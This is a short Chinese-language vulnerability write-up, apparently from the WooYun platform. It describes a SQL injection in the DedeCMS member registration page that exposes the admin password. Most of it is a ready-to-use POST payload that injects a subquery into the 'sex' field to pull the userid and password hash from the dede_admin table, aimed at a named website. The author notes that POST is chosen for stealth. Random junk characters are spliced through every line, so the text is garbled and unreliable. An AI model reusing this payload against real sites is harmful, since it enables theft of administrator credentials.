漏洞类型: SQL注射漏洞
( @; X! s8 A; ^4 l+ a( X0 W K/ \: Y* m简要描述:6 e6 w6 T' C. K1 I
* g2 I1 O J! G# s
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.- H+ N* o8 i1 r. w; n3 I$ J
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.4 C7 t7 i- J# j3 c6 v' t
详细说明:跟这个漏洞
0 ~$ T5 V" i/ i; c& m, U) y- \ - p: ^: R) q3 |/ @9 |" g, L
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
+ z6 Q5 O- R7 H4 C$ k( e& s3 b9 u是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.3 k; |4 b2 ~5 X8 y- a
POST提交以下数据,其实不用POST提交的,这样隐蔽点.% T' R- l1 d& u
{. P) J( x6 R/ O" }% H) m& U3 e) {
www.political-security.com/member/reg_new.php
6 O" D/ o% b) p
; K" h3 f' r- w7 N5 x: `+ IPOST+ |# c7 G* c1 V3 ^& j
- v+ {+ |9 ~% {9 i
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&: L6 U G1 B9 a5 s8 a# r# i
userid=c4rp3nt3r&uname=c4rp3nt3r
: ^, k' Z; z7 s6 @7 F/ y% _&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
6 @0 O4 u5 J# `7 S7 Z* P1 S* [&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,- Q; S2 E$ `, Y/ `/ U W
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
$ H& N6 X8 h! v) C+ g%00&vdcode=glos&agree= |